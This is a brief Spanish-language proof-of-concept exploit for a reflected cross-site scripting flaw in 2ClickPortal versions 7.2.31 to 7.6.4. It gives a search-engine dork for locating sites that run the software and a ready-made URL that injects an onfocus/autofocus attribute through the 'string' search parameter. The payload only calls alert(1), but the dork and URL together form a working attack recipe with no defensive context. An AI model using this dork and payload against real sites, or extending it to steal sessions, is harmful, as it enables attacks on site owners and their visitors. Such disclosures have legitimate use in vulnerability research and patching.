
Prueba de concepto de explotación para la vulnerabilidad de XSS reflejado en las versiones 7.2.31 a 7.6.4 de 2ClickPortal, con una carga útil de inyección en el parámetro de búsqueda.
XSS reflejado en 2ClickPortal
Versión: desde 7.2.31 hasta 7.6.4.
intext:"Powered by 2ClickPortal"
https://[domain]/szukaj/?search_lang=pl&search=all&string=" onfocus=alert(1) autofocus="